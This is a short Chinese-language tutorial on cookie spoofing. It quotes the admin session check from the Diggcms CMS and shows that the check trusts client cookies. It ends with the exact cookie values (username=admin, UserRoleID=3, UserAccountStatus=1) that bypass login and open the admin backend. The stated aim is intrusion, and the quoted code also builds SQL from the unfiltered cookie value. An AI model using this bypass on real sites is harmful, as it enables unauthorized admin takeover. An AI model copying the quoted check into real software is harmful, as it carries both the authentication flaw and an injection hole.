在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录。初级的可以修改Cookies的过期时间,实现永久登陆的目的。Cookies欺骗在入侵中经常用到,通过修改Cookies的内容来得到相应的用户权限登录,从而达到入侵的目的。
到底什么是Cookies,它有什么作用呢?Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时,由Web服务器置于你硬盘上的一个非常小的文本文件,它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。
Cookies欺骗实例:
以Diggcms为例我们看代码:
后台登陆验证是通过session.asp实现的,看代码
set conn=linkDB(datapath_admin) if request.Cookies("username")="" then '如果获取的Cookies中username为空就跳转到login.asp response.Redirect("login.asp") response.End() end if Call limits(2) '管理员权限 Sub limits(pnum) set ris=conn.execute("select UserAccountStatus,UserRoleID from tc_user where UserName='"&request.Cookies("username")&"' and UserRoleID in(2,3)") '查询Cookies中的username和UserRoleID在数据库中是否有记录 if ris.eof then call ShowWin("<br><br><center>没有授权</center>") response.End() else if ris("UserAccountStatus")=0 then 'UserAccountStatus为0则为没激活用户 response.Write "没有激活" response.End() end if if pnum=3 then if ris("UserRoleID")<>3 then ' response.Write "没有授权" call ShowWin("<br><br><center>没有授权</center>") response.End() end if end if end if ris.close set ris=Nothing End sub
因此我们只要修改COOKIES中的username和UserRoleID以及UserAccountStatus即可。
打开我们可以修改Cookies的浏览器,之后再Cookies后面添加:
;UserAccountStatus=1; username=admin; UserRoleID=3;
这样我们再刷新页面打开index.asp 就直接进入了后台。
标签分类: